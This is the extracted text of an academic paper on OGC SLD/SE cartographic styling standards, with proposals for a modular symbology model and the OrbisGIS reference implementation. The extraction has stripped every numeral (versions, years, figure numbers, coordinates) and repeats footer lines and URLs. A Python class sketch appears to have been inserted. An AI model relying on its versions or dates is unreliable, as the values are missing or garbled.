the ability to drive remotely the authoring of visualizations is fundamental for this use case, for example to fulfill the cartographic requirements of mr tüftel. he does not want to download the spatial data, he just wants to adjust the visualization according to his specific needs (fig. ). just send the below wms/sld request which has a reference to a style file. this latter includes some se instructions which allow to get a customized visualization (fig. ): https://wms.geo.admin.ch/?service=wms&version= . . &request= getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata- kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld figure authoring of user style to visualize map layers with ogc wms/sld and se standards. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the wms/sld getmap operation allows to reference a style authored by the user client, either hosted on an external server (parameter sld) or directly sent with the wms request (parameter sld_body). <?xml version=" . " encoding="utf- " standalone="yes"?> <styledlayerdescriptor version=" . . " xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc" xmlns:xsi="http://www.w .org/ /xmlschema-instance" xsi:schemalocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/ . . 
/styledlayerdescriptor.xsd"> <namedlayer> <name>ch.swisstopo.pixelkarte-pk .metadata-kartenblatt</name> <userstyle> <name>labelblattnummer</name> <featuretypestyle> <rule> <polygonsymbolizer> <fill> <cssparameter name="fill">#ffff </cssparameter> </fill> <stroke> <cssparameter name="stroke"># </cssparameter> <cssparameter name="stroke-width"> </cssparameter> </stroke> </polygonsymbolizer> <textsymbolizer> <label> <ogc:propertyname>blattnummer</ogc:propertyname> </label> <font> <cssparameter name="font-family">arial</cssparameter> <cssparameter name="font-size"> </cssparameter> </font> <fill> <cssparameter name="fill"># </cssparameter> </fill> </textsymbolizer> </rule> </featuretypestyle> </userstyle> </namedlayer> </styledlayerdescriptor> bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in other words, the user client (e.g., mr tüftel) does take the control of the rendering process that may be distributed among many wms servers. indeed, this ability to drive remotely from the user client side (with a map viewer including a style editor) the wms rendering server does open interesting doors to bring to life the other use cases. use case “catalog” going further than using a simple wms getmap request to get a ready-to-visualize map layer, the deprecated implementation specification (version . , released in ) of the wms/sld standard (lalonde, ) does offer style management requests like getstyles. so you get also the underlying symbology instructions of an internal style that has been predefined and used by the server to show a prepared cartographic facet of some spatial data of the underlying datasets. thus, the retrieved style is ready to be reworked by the user client within a cartographic tool (fig. ). while such an ability is already interesting for the use case level , the sld . style management offers not only getstyles operation but also putstyles operation. together, these operations are a good start for the use case level to build a catalog of styles. the wms service is then also the storage point to discover, import and export styles to share with other sdi users through a catalog service. nonetheless, it is to notice that the newest sld . release does not specify anymore the style management requests which is then a step back. use case “collaborate” finally, for the use case level , the se standard is also a centerpiece (fig. ). as experimented by bocher et al. ( ) in the frame of the sogville/scapc research projects, se figure visualization of the grid of map sheets of switzerland ( : , ) through another cartographic facet showing labels based on the sheet number. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ instructions are encapsulated into a structure of map project that different users share and work together in the frame of a collaborative cartographic authoring process. indeed, while the ogc ows context standard is used to formalize the map project, it does in particular consider sld and se to formalize the shared styles used to render the map layers. currently, sld (sld . ) or se (se . ) (as styling language to formulate symbology instructions) are the more advanced open standards for sharing cartography as illustrated figure re-authoring of styles shared through catalogs with ogc wms/sld standards. full-size doi: . /peerj-cs. 
/fig- figure creation of a common map based on shared styles with ogc wms/sld, se and ows context standards. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by the above use case levels. these standards are quite largely adopted by server-side rendering systems. it can be explained because sld is a wms application profile which is web service oriented. indeed, andrae et al. ( ) redraws the ogc portrayal model by showing clearly sld as the web interface to take control of the rendering engine behind the wms service. but in , the wms/sld . profile has been released in particular with the aim to extract the symbology instructions into a dedicated standard, the se standard (se . ). as a consequence, while the sld profile stays strongly related to wms service, it is no longer the case for the symbology instructions which can now be used by any styling software component, not only by wms/sld. nonetheless, at the desktop-side there are only few software which correctly and completely implement se standard together with a graphical user interface to (re)work styles. indeed, according to bocher et al. ( ) many implementations have a conformance that is often not fully observed leading to interoperability defects in term of rendering quality. apart from inherent bugs and dysfunctions of a tool, several reasons can explain this general situation. � due to a partial implementation—see mapserver implementation (mckenna, ), there are unimplemented symbology instructions, e.g., linejoin and linecap of linesymbolizer; � due to the existence of two versions of symbology instructions between sld . and se . , these tools may not check this correctly which causes parsing problems of the xml encoding; � due to the divergent reading of what the se . standard tries to specify which may result in different graphical visualizations (it means there are uncomplete or ambiguous explanations in the specification—like the markindex capability which doesn’t specify anything on how to select an individual glyph); � related to the previous point, there is currently no substantial testsuite within the ogc compliance and interoperability testing initiative (“cite”) to help to disambiguate and test the graphical rendering conformance of an implementation. beyond encoding validity and level of conformance of an implementation (range of supported capabilities), visual interpretation is essential (see annex a in müller ( )). for instance, by comparing the output of a system to test with the output of the reference implementation. while the above arguments do show how it is essential to have a common styling language (currently in the name of ogc se . ), this importance is accentuated by the fact that many changes and proposals have been received by the standard working group (swg), in particular from the scientific community (duarte teixeira, de melo cuba & mizuta weiss, ; cooper, sykora & hurni, ; sykora et al., ; dietze & zipf, ; sae-tang & ertz, ; schnabel & hurni, ; mays, ; iosifescu-enescu, hugentobler & hurni, ; bocher et al., ; rita, borbinha & martins, ; bocher & ertz, ). all these works share a common claim about enhancing se. it seems the communities of users were frustrated because no substantial new symbology capabilities bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ have been introduced with the release of se . except transformations functions. moreover, bocher et al. ( ) and bocher & ertz ( ), explain that these only new and few capabilities (interpolate, recode, categorize functions) cause confusions and even some regressions. for instance, despite all the good intentions, there are several limits that come out from the introduction of the categorize function (defined by se . standard as the transformation of continuous values to distinct values, e.g., useful to build choropleth maps): � the definition seems to only match a requirement emphasized by jenks (slocum et al., ) that classes must cover all the possible values of the dataset and must not be discontinuous. however, such a definition has limits considering optimal methods like the jenks–fisher classification or maximum breaks classifications that may produce intervals with gaps (slocum et al., ) and that it is often better to use the lowest value of the dataset as the minimum value of the first interval rather than negative infinity; � the categorize function is redundant with the concept of rule of the se standard. moreover, the latter does offer wider possibilities to define precisely value intervals (minimum/maximum values instead of negative/positive infinite, non-contiguous intervals, interval as singleton); � similarly, the rastersymbolizer concept used to control the styling of raster data has been reduced because of the colormapentry concept from sld . has been replaced by the categorize transformation function; � finally, the introduction of categorize function has also removed from sld . the capability to associate a label to an interval when it is an important requirement to have such an information to build a map legend. along the same lines, the many proposed extensions of sld and se standards have to be analyzed. the purpose is to identify how these cartographic enhancements are relevant for the redesign of the se standard. by way of other examples, sae-tang & ertz ( ) describe four new possibilities to generate thematic maps (categorythematicsymbolizer, simplethematicsymbolizer, multithematicsymbolizer, chartthematicsymbolizer). a similar approach appears in dietze & zipf ( ) (diagramsymbolizer and choroplethsymbolizer) and in iosifescu-enescu, hugentobler & hurni ( ) to support various diagram types (e.g., pie charts, bar diagrams) to fulfill the complex visualization requirements coming from environmental management. also, the specific options introduced within the xsd schemas by some off-the-shelf geospatial software (e.g., “geoserver”) have to be considered. of course the extensible nature of xml is convenient to add cartographic capabilities to implement in the software, but it may at the same time also create some non-interoperable defects. clearly, it seems se . has never been designed with modularization and extensibility in mind and there are no explicit extension points defined in the underlying symbology model. moreover, the se standard does currently only offer one xml-based encoding and strongly linked to xml modeling principles (fig. ). as a consequence, it may be bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ difficult for cartographic communities and developers having different encoding preferences (e.g., css-like or json-based) to get a chance to observe conformance. 
indeed, while there is a general trend to dislike xml, other encodings seem to be in fashion, like the yaml-based ysld styling language proposed by geoserver ( ) in addition to the support of ogc sld standard, or the css-derived styling languages mapcss (openstreetmap, ) or cartocss styling language from mapbox ( ), although it seems already old-fashioned (macwright, ). also, there are major proponents of an encoding which would make a wider use of relevant and famous graphical standards like svg, just like ows context does use the famous atom syndication format (brackin & gonçalves, ). beyond the trends, there is no consensus by now. figure the physical symbology model of se formalized with xml schema definition. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to conclude this chapter, while there are clear possibilities to implement the four levels of sharing cartography, it is also clear that a revision of the common styling language played by the se standard is required. three major requirements have to be considered: � enrich the standard with new cartographic capabilities inline with the evolution of the needs coming from the map-makers community; � redesign the underlying symbology model of the standard so as to be modular and extensible for the long-term; � consider the possibility to have other encodings than xml. the next chapter does develop some proposals to fulfill these requirements. proposals the overall purpose is to make standards dedicated to cartography (in particular se) more attractive by turning them into “a really useful (cartographic) engine,” quoting the nod to thomas the tank engine alluded by the ogc “specification model—a standard for modular specifications” document (policy swg, ), called the modular spec in below. before compiling all the change requests collected by the sld/se swg, one question does arise: how to plug a new requested ability in the standard? one first and fundamental recommendation is then to consider the modular spec whose release . has been edited in , at the time the se standard was already released and thus not in compliance with. indeed, the modular spec specifies generic rules to organize the internal logical structure of the standard in a modular way so as to strengthen the guarantee of a useful and worth standard easy to implement but also to extend. modular structure: one symbology core, many symbology extensions the modular spec fittingly suggests modularity with the idea of a standard built of one simple core and many extensions which expand the functionality of the specification. applied to a new revision of the se standard, the definition of a symbology core requires first to “reverse design” the underlying symbology model of se . . after which, the concrete symbology capabilities have to be extracted and split into many relevant extensions while taking care of dependencies. the proposed minimal symbology core illustrated by fig. is partially abstract and defined according to the following concepts: � the style concept, in charge of the cartographic portrayal of a collection of features stored within a layer by applying at least one symbology rule. a feature is described as an abstraction of real world phenomena as defined by gml standard (portele, ); figure recommendation for a minimal symbology core. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. 
sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � the rendering does run feature per feature using a “one drawing pass” engine; � each rule may be scale filtered and does hold at least one symbolizer; � each symbolizer does describe the graphical parameters for drawing the features (visual variables); � the style, rule and symbolizer concepts hold parameters which are literal values. some of the concepts are defined as abstract (in yellow and with italic names in fig. ) so as to be considered as extension points. actually, regarding this, we may notice that craig ( ) does request a similar concept by the use of xml abstract elements which may than be considered as extension points. now that the core is ready, some surrounding extensions may be defined so that the engine is really able to perform a rendering. indeed, alone, the core does not concretely “do” anything. as an example, let us introduce the areasymbolizer extension which holds a simple and classical symbolizer, call it the areasymbolizer concept which describes the graphical parameters for drawing polygonal features with outlined and filled surface areas. the aim of the below explanations is to illustrate with a simple example the extension mechanism and how extension points are expanded. at first, it is defined that the areasymbolizer extension has a dependency with the featuretypestyle extension and the related concepts: � the featuretypestyle specialization of the style core concept; � the portrayal of a layer built of n instances of gml abstractfeaturetype (portele, ); � the ability to access features according to simple feature sf- (van den brink, portele & vretanos, ); � the geometry parameter to each symbolizer extension that depends on this extension (in this case the areasymbolizer extension). then, given that the geometry parameter is defined with a dependency on the valuereference extension, the valuereference specialization of the parametervalue core concept is introduced. in a general way, when a parameter has to be assigned with a value, valuereference does introduce the ability to reference the value extracted from a data attribute of a feature. this is useful when a featuretype does hold many geometry properties and allows to reference the one to be used by the renderer. finally, the areasymbolizer extension itself is required, holding the areasymbolizer specialization of the symbolizer core concept. called polygonsymbolizer in se . and correctly renamed areasymbolizer by craig ( ), it does introduce: � the symbology ability to draw a surface area according to a filling and an outline; � the dependency on the featuretypestyle, fill and stroke extensions; � the ability to reference the geometry data attribute to be drawn (by means of its dependency on the featuretypestyle extension). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in consequence, an implementation that wants to observe conformance with the areasymbolizer extension requires to implement and drive its rendering engine according to all the concepts of the core (thin outline in fig. ) and the areasymbolizer concept with all the other concepts required by dependencies (bold outline in fig. ). nonetheless, even at this point, a rendering engine would neither concretely “do” anything. indeed, the implementation has then to offer choices related to the filling and the outline. 
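to illustrate the core/extension split described above, the following sketch transcribes the concepts into code (purely illustrative: the class and field names mirror the concepts named in the text, and the mapping to classes is an assumption, not the normative model of the standard):

    from abc import ABC
    from dataclasses import dataclass
    from typing import List, Optional

    # symbology core: partially abstract concepts acting as extension points
    class ParameterValue(ABC): ...
    class Symbolizer(ABC): ...
    class Fill(ABC): ...
    class Stroke(ABC): ...
    class Color(ABC): ...

    @dataclass
    class Rule:                       # may be scale filtered and holds at least one symbolizer
        symbolizers: List[Symbolizer]
        min_scale: Optional[float] = None
        max_scale: Optional[float] = None

    @dataclass
    class Style:                      # cartographic portrayal of a layer through at least one rule
        rules: List[Rule]

    # extensions expanding the core
    @dataclass
    class ValueReference(ParameterValue):   # value taken from a data attribute of a feature
        attribute_name: str

    @dataclass
    class RgbColor(Color):                  # concrete color in the sRGB color space
        r: int
        g: int
        b: int

    @dataclass
    class SolidFill(Fill):                  # solid color combined with an opacity
        color: Color
        opacity: float = 1.0

    @dataclass
    class PenStroke(Stroke):                # continuous or dashed outline
        color: Color
        width: float = 1.0
        dash_array: Optional[List[float]] = None

    @dataclass
    class AreaSymbolizer(Symbolizer):       # outlined and filled surface areas
        geometry: Optional[ValueReference] = None   # which geometry attribute to draw
        fill: Optional[Fill] = None
        stroke: Optional[Stroke] = None

for instance, a style similar to the map-sheet grid example shown earlier could then be assembled as Style(rules=[Rule(symbolizers=[AreaSymbolizer(fill=SolidFill(RgbColor(255, 255, 0)), stroke=PenStroke(RgbColor(0, 0, 0)))])]) before being serialized into whichever encodings the revised standard retains.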
some more concrete capabilities have to be implemented, for instance with (dashed outline in fig. ): � the solidfill concept, a fill specialization which introduces the graphical ability to define a solid color value combined with an opacity; � the penstroke concept, a stroke specialization which introduces the graphical ability to draw a continuous or dashed line with or without join and cap; � the dependent abstract color concept (and again a concrete choice of color definition has to be done, like with the rgbcolor concept which defines a color in the srgb color space with three integer values). having this modularity approach for long term extensibility applied to all the symbolizer concepts, past, present and future, an implementation can with ease manage step by step the evolution of the conformance level of its technical implementation of the standard. one encoding-neutral conceptual model, many encodings currently, se . offers a physical model using xml schema definition and, at the same time, a natural encoding based on xml. the initial motivation explaining the below recommendation is related to the fact that there is not only xml, but also many other flavors of encoding, json-like, css-like, yaml-like among many others it is possible to imagine. the important for portrayal interoperability is not the encoding, it is rather the figure concepts to implement so as to observe conformance with the areasymbolizer extension. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ symbology model. that is why the “one encoding-neutral model/many encodings” approach is promising to favor a large adoption of the standard. this approach has on one side the encoding-neutral model formalized using uml notations, it can be considered as conceptual. with a class diagram, it does describe the portrayal concepts, their relationships, the modular organization, the extension points and the dependencies. we may notice that uml is often preferred when some work is about the design of portrayal concepts. in zipf ( ), a simplified version of the underlying symbology model of se . is depicted as an uml class diagram. moreover, craig ( ) does suggest to avoid the xsd attribute concept in the xml encoding so as to be more portable to other structuring languages which do not have the unusual attribute concept of xml schema, uml in particular. these are more arguments that are in favor of defining at first a conceptual and encoding-neutral model (fig. ). consequently, doors are open to offer a variety of encodings. each encoding does translate into a format the uml notations according to mapping rules. at least one figure extract of the proposed symbology model. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ default encoding and following the ogc tradition, xml may be this default encoding. it is up to the swg to define the mapping rules to translate the semantic of the conceptual model into xml schema definitions. indeed, as noticed by lonjon, thomasson & maesano ( ), the translation from uml to xml requires a thoughtful analysis of the conceptual model so as to define the global mapping rules (e.g., translate a specialization relationship using static or dynamic typing? 
how to translate a concrete class, an abstract class, the various types of associations? when using attributes or elements?, etc.). thus, uml and xml are together a winning combination two times inline with the modular specification which recommend uml “if the organizing mechanism for the data model used in the specification is an object model” and xml “for any specification which has as one of its purposes the introduction of a new xml schema.” of course, all these questions related to the mapping rules have to be considered for each encoding offered with the standard. we may notice that the ows context swg adopted a similar approach, offering the default encoding based on xml atom and planning to provide an ows context json encoding soon, according to brackin & gonçalves ( ). style management and parametrized symbolizer beyond the tempting recommendation to reintroduce the wms/sld getstyles and putstyles methods, the management of a catalog of styles has to be expanded. thus, craig ( ) does suggest the introduction of a mechanism to reference the definition of a symbolizer hosted within a catalog. moreover, the report does enrich the referencing with a symbolizer-parameterization mechanism so as to offer complete symbolizer re-usability between different, incompatible feature types. it consists of a list of formal-parameter names and an argument list. it is to notice that such a mechanism does fit the one specified by iso ( ) in term of parameterized symbol built of dynamic parameters. thus, in a general way, it is recommended to consider what iso has already specified concerning the concepts of “collection of symbols and portrayal functions into portrayal catalog.” concerning this aspect of style management, the proposal suggests to continue the conceptual work by blending together all these recommendations: reintroduce getstyles/ putstyles and introduce the mechanism of symbolizer-parameterization inline with iso ( ). new symbolization capabilities among the many symbology capabilities that can be extracted from the pending change requests at ogc and the research works, we list below (non exhaustively) some relevant ones. considering the modular structure (see a), each of these capabilities is an extension (e.g., hatchfill is an extension of the fill abstract concept, just as solidfill): � unitofmeasure: current se . standard does only offer two ground units (meter and foot) and one portrayal unit (pixel, which is also not an absolute unit of measure). it may be relevant to add at least three additional units to make measurements more bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ portable between styling representations and rendering environments: portrayal millimeters and inches as printing measurements, and portrayal (printer’s) points commonly used for font sizes; � transformations: currently, se . standard does offer only locally few transformations capabilities (translation of a polygon or graphic, rotation of a graphic). it may be relevant to spread out all kind of general affine transformations like translate, rotate, scale, matrix using homogeneous coordinates on geometries and graphics; � functions: currently, se . standard does extend the concept of ogc:expression inherited from the deprecated filter encoding . 
standard (vretanos, ) to adequately support the needs of symbolization in transforming (categorization, recoding, and interpolation) and editing data (formatting numbers, strings and dates). it may be relevant to directly use the function definition mechanism of filter encoding . standard (vretanos, ) rather re-inventing such a mechanism (craig, ); � compoundstroke: current se . standard does offer simple stroke just like with a pen (optionally with dash pattern) or the linear repetition of a graphic. it may be relevant to allow multiple graphic and/or simpler strokes to be combined together along the linear path. it is interesting to produce complex stroke styles such as rendering a sequence of graphic icons along a line or drawing simple dashed lines between boat-anchor icons (craig, ); � compositesymbolizer: currently, grouping of symbolizers is only possible in relation with a rule, eventually driven by a filter. it may be relevant to manage descendant symbolizers as a single unit separately from the definition of a rule. having a dedicated concept for grouping symbolizers does make the logical grouping more explicit and allows a group of symbolizers to be remotely referenced (see the symbolizerreference concept in craig ( )); � hatchfill: currently, se . standard allows one color filling and the repetition of a graphic to fill an area. it may be relevant to add cross hatching, a method of area filling which is often used and has so simple parameters that it should be established as another filling variety. it is required to allow the configuration of such a filling in a way conventional in cartography, otherwise the user would be forced to emulate cross hatching by fiddling with the graphicfill concept; � diagramsymbolizer: current se . standard does allow the use of graphics generated externally (e.g., static image) or well-known shapes or font glyph whose color can be set internally. it may be relevant to allow the internal definition of more complex diagram symbolization of geographic features like “pie,” “bar,” “line,” “area,” “ring,” and “polar” charts. indeed, it is a usual and effective way of visualizing statistical data (iosifescu-enescu, ); � multiple drawing pass: current se . standard does describe a one drawing pass rendering (driven by applying symbolizers in the order they are defined by the style and according to rules and filters). it may be relevant to better control the rendering with the capabilities to order the level of symbol rendering (e.g., to draw nicely connected highway symbols). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reference implementation the orbisgis platform has been used to prototype an implementation of the symbology model all along the standardization work by iterations with tests and validations (bocher & petit, ). in the long term, this platform might be adopted as a reference implementation at the ogc (“cite”). orbisgis is a geographical information system designed by and for research (bocher & petit, ) which is the main advantage for research communities comparing to other gis. indeed, orbisgis does not intend to reproduce classical gis functionalities. it is designed to explore new issues or questions in the field of geospatial techniques and methods (such as language issues to query spatial information and issues on cartography about standardization, semantics and user interface design). 
to address these challenges, the orbisgis architecture (object and data model) and its user interface are frequently redesigned. this approach is fundamental to test the concepts and the ideas related to the ongoing standardization process of symbology standards at ogc. furthermore, the fact that we have a common set of gis features organized with the dynamic module system osgi to access to the geodata, library to use simple features functions, layer model, rendering engine, etc. (osgi, ), gives flexibility to plug some experimental code without breaking the platform and the user can easily switch from one to another plugin (fig. ). more importantly, the usage of osgi technology does offer a way to implement the modularization principles depicted in the above (i.e., one osgi bundle per symbology extension). another motivation is related to the license. orbisgis is an open source software, distributed under the gpl license and therefore grants four freedoms ( ) to run the program for any purpose, ( ) to study how the program works and adapt it to your needs, figure orbisgis dynamic module system with osgi. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( ) to redistribute copies so you can help your neighbour, and ( ) to improve the program, and to release your improvements to the public, so that the whole community benefits (steiniger & hunter, ). this aspect is essential in order to have a reference implementation available for the community of implementers of a standard, guiding them better in the understanding of a specification. given the core principle of science that having open source code available does enable reproducibility (ertz, rey & joost, ), we argue that this is also valid for open standards. on one side, it is easy for other researchers and businesses to verify and re-use new developments and adapt them to their needs (steiniger & hunter, ). furthermore, having the code of the rendering engine, the user interfaces and all the tests fully accessible should facilitate the understanding and the dissemination of standards for portrayal interoperability while minimizing interoperability defects. in the following we describe the main aspects covered by orbisgis to implement the proposed redesign of the symbology model. xml encoding/decoding in the context of a prototyping iteration, the symbology model presented in the chapter has been transposed to a xsd schema (maxence et al., ). the java architecture for xml binding (ort & mehta, ) library is used to generate the xsd schema-derived java binding classes. finally, a java style object model is built. thus, symbology instructions are stored in a style file using xml encoding and is parsed prior to be applied by the rendering engine. rendering engine the rendering engine is a osgi bundle whose mechanism is divided into sequences (fig. ): ( ) user interface event to draw a map. ( ) the renderer engine gets the style file that contains the symbology instructions. figure main sequences of the rendering engine. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( , and ) the style file is read by the xml parser to create the java style object model composed of rules and symbols. 
( ) the renderer engine starts to draw the style object looping over each rules. ( ) each rule is scanned to check if a filter must be applied. the filter condition (e.g., select all values greater than : : : ) is prepared for each symbolizer of the rule. ( ) the renderer engine starts to draw all symbols available in the java style object model. ( ) each symbol reads the data source on which the style must be applied. ( ) a set of features according to the potential filter constraint of the symbolizer is returned (including geometries and data attributes). ( ) the symbols are filled with the features properties to create the graphic elements and visual variables. ( ) finally, the renderer engine displays the style as a map image. user interfaces orbisgis offers two kind of user interfaces for configuring the map styles using the capabilities of the underlying symbology model (fig. ): � at first some productivity tools organized around a set of widgets each dedicated to common thematic maps. the possibilities are limited to what these widgets are able to configure related to what they have been built for. nonetheless, the second tool can then be used in an expert mode to go further. � secondly, rather intended for an expert who want to tinker and tweak. as an advanced style editor, it is a flexibility tool which allows to manipulate all elements of the symbology model (rule, symbols, visual variables). a good knowledge of the symbology model is required because each elements of the style must be set individually. consequently, the user can express without any limitation (except the limits of the symbology model itself) all her(his) creativity to build cartographic visualizations. to illustrate some results rendered with orbisgis we present two maps extracted from the “wall of maps” (bocher & ertz, ). the first one shows a bivariate map to display the number of building permits in europe in compared to (fig. ). bivariate map is a common technique to combine visual variables. the map uses the same type of visual variable to represent two values (as half circles). the main symbology elements used to create this bivariate map are: � the style element contains two rules named a and b; � rule a contains one symbolizer element (areasymbolizer) to display the stroke of the european countries; � rule b defines the bivariate proportional symbol with two elements of pointsymbolizer (for readability, we present only the instructions for the left half-circle visual variable); bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � the pointsymbolizer contains several sub-elements: – the geometry element allows specifying which geometry attribute is to be rendered; – the st_pointonsurface is an ogc filter function (vretanos, ) used to have a point geometry guaranteed to lie on the surface. 
this new point derived from the input geometry is the location where to anchor a markgraphic, otherwise the symbol might be applied on all the vertices of a geometry; � the markgraphic is defined by: – the symbol shape identified by a well-known name, halfcircle (right side); – the size of the shape varies according the height of its view box; – to have the shape size proportional with the number of building permits in : � an interpolate function is applied on; � it uses a valuereference that points to the attribute named permits ; � the interpolation is defined by two interpolation points chosen along a desired mapping curve (here the minimum and maximum values); � for each interpolation point the height of the view box is specified with a specific unit of measure; – because the half-circle shape is drawn to the right side, a � rotation is operated; – to finish, the markgraphic is filled with a rgb color. the second map shows a combination of several visual variables: shape, size, color, patterns and orientation (fig. ). the style is organized around six filtered rules that correspond to the biogeographic regions in switzerland. we present two rules (a and b) that use the hatchfill and graphicfill concepts which are extensions of the fill abstract concept of the symbolizer model. conclusion considering the fundamental works of bertin & berg ( ) and successors, the community of map makers has constantly investigated questions about cartographic visualizations in term of design using the appropriate visual variables and combining them together with relevancy. despite an important body of principles and practices, the community did not grasp the questions about standardization. however, given the multiplicity of software used to flood the world with maps, these questions are nowadays a strategic challenge to be considered in relation with operational requirements. even if the definition of a cartographic-oriented standard is not able to act as a complete cartographic design framework by itself, we argue that pushing forward the work aiming at the creation of dedicated standards for cartography is a way to share and disseminate good practices. indeed, too much sdis do merely accept the limits of the current standards and consequently poor map design and quality. while they have to apply ogc standards, it is essential to build standards so as to be able to enrich their bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure (a) the screenshot shows the list of productivity tools available in orbisgis. (b) the screenshot shows the user interface of the productivity tool dedicated to choropleth maps. (c) the screenshot shows a prototype of advanced style editor. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure (a) symbology instructions showing how to combine visual variables (yaml encoded for the ease of reading). (b) a map of the biogeographic regions in switzerland coming out from the rendering engine using these instructions. full-size doi: . /peerj-cs. /fig- figure (a) some redesigned symbology instructions (yaml encoded for the ease of reading). (b) a bivariate proportional symbol map coming out from the rendering engine using these instructions. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cartographic capabilities at long-term, to make grow up the good practices and finally to improve the quality of the visualizations. in this sense, we have identified some use cases showing how it is important to make portrayal interoperability operational for sharing cartography, from discovery to collaboration activities, by way of authoring and cataloging activities. from research results in link with the dedicated sld/se ogc swg (ertz & bocher, ), this paper does extract some recommendations to enable portrayal interoperability. they invite to improve the ogc se standard based on principles and practices in cartography. we start from a functional definition of a map translated into a set of visual variables which are combined to create symbols and finally a map style. the proposed recommendations do observe this functional definition which is already at the heart of how se standard has been specified by ogc. now, in the long term, it is recommended that a design approach is driven by a conceptual definition of the model and unconstrained by specific encoding aspects, and, as soon as the model is ready, then a default encoding is offered (e.g., xsd/xml). following from this approach of dissociation, it does allow the definition of other encodings according to the various flavors within the communities. given that the cartographic requirements will progress over time due to practices growing up and according to domain specific features, the offered symbology model is empowered so as to be extensible and ready to offer new cartographic methods. moreover, such a modular approach allows implementations to be compliant step-by-step. as a consequence the adoption of the standard should be favored. finally, we claim to a testsuite within the ogc cite so as to help to disambiguate and test the visual conformance of the implementations. while it 